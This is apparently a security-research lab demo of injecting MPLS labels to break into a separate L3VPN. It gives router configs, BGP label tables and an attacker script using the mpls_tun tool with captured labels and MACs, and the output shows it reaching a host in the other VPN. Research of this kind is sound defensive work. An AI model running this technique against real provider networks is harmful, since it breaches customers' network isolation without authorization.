***************
*    VPN1     *
*172.31.2.0/24*
***************
       *
       *
*******************   *******************   *******************
*       PE1       *****     ATTACKER    *****       PE2       *
*00:1e:f7:9e:40:71*   *                 *   *00:1f:9d:44:8c:c0*
*      2811       *   *******************   *     3750-ME     *
*******************                         *******************           
                                                        *
                                                        *
                                                ***************
                                                *     VPN2    *
                                                *172.31.1.0/24*
                                                ***************


PE1:

ip vrf shmoo
 rd 100:1
 route-target export 100:1
 route-target import 100:1
!

interface Loopback0
 ip address 192.168.1.2 255.255.255.255
!
interface FastEthernet0/0
 ip vrf forwarding shmoo
 ip address 172.31.2.1 255.255.255.0
 duplex auto
 speed auto
!
interface FastEthernet0/1
 ip address 10.10.10.2 255.255.255.0
 duplex auto
 speed auto
 mpls ip
!
router ospf 1
 log-adjacency-changes
 network 10.10.10.0 0.0.0.255 area 0
 network 192.168.1.2 0.0.0.0 area 0
!
router bgp 1
 no synchronization
 bgp log-neighbor-changes
 neighbor 192.168.1.1 remote-as 1
 neighbor 192.168.1.1 update-source Loopback0
 no auto-summary
 !
 address-family vpnv4
  neighbor 192.168.1.1 activate
  neighbor 192.168.1.1 send-community both
 exit-address-family
 !
 address-family ipv4 vrf shmoo
  redistribute connected
  no synchronization
 exit-address-family



#sh bgp vpnv4 unicast vrf shmoo labels
   Network          Next Hop      In label/Out label
Route Distinguisher: 100:1 (shmoo)
   172.31.1.0/24    192.168.1.1     nolabel/16
   172.31.2.0/24    0.0.0.0         17/aggregate(shmoo)

#sh ip route vrf shmoo
Routing Table: shmoo
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     172.31.0.0/24 is subnetted, 2 subnets
C       172.31.2.0 is directly connected, FastEthernet0/0.100
B       172.31.1.0 [200/0] via 192.168.1.1, 02:27:16




PE2:


!
ip vrf shmoo
 rd 100:1
 route-target export 100:1
 route-target import 100:1
!

interface Loopback0
 ip address 192.168.1.1 255.255.255.255
!
interface FastEthernet1/0/19
 switchport access vlan 19
!
interface FastEthernet1/0/24
!
interface Vlan1
 ip address 10.10.10.1 255.255.255.0
 mpls ip
!
interface Vlan19
 ip vrf forwarding shmoo
 ip address 172.31.1.1 255.255.255.0
!
router ospf 1
 log-adjacency-changes
 network 10.10.10.0 0.0.0.255 area 0
 network 192.168.1.1 0.0.0.0 area 0
!
router bgp 1
 no synchronization
 bgp log-neighbor-changes
 neighbor 192.168.1.2 remote-as 1
 neighbor 192.168.1.2 transport path-mtu-discovery
 neighbor 192.168.1.2 update-source Loopback0
 !
 address-family vpnv4
  neighbor 192.168.1.2 activate
  neighbor 192.168.1.2 send-community both
 exit-address-family
 !
 address-family ipv4 vrf shmoo
  redistribute connected
  no synchronization
  network 172.31.1.0 mask 255.255.255.0
 exit-address-family



#sh bgp vpnv4 unicast vrf shmoo labels
   Network          Next Hop      In label/Out label
Route Distinguisher: 100:1 (shmoo)
   172.31.1.0/24    0.0.0.0         16/nolabel(shmoo)
   172.31.2.0/24    192.168.1.2     nolabel/17

#sh ip route vrf shmoo
Routing Table: shmoo
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area 
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

     172.31.0.0/24 is subnetted, 2 subnets
B       172.31.2.0 [200/0] via 192.168.1.2, 02:26:51
C       172.31.1.0 is directly connected, Vlan19






ATTACKER:



# cat test.sh

#!/bin/sh
./mpls_tun -m l3vpn -d br0 -D br0 -i 17 -o 16 -I 00:1e:f7:9e:40:71 -O 00:1f:9d:44:8c:c0 -v &
sleep 2
ifconfig tun0 172.31.2.11/24
ifconfig tun0 mtu 1300
route add -net 172.31.1.0/24 dev tun0
ping 172.31.1.1




# ./test.sh

mpls_tun version 0.1	by Daniel Mende - dmende@ernw.de
Tunnel interface tun0 started
Opening tunnel at br0 with MAC 00:1e:f7:9e:40:71
Sending to MAC 00:1f:9d:44:8c:c0 on interface br0
PING 172.31.1.1 (172.31.1.1) 56(84) bytes of data.
64 bytes from 172.31.1.1: icmp_seq=1 ttl=255 time=2.96 ms
64 bytes from 172.31.1.1: icmp_seq=2 ttl=255 time=2.42 ms
64 bytes from 172.31.1.1: icmp_seq=3 ttl=255 time=2.04 ms
64 bytes from 172.31.1.1: icmp_seq=4 ttl=255 time=1.67 ms
64 bytes from 172.31.1.1: icmp_seq=5 ttl=255 time=1.16 ms
^C
--- 172.31.1.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4013ms
rtt min/avg/max/mdev = 1.162/2.054/2.964/0.618 ms
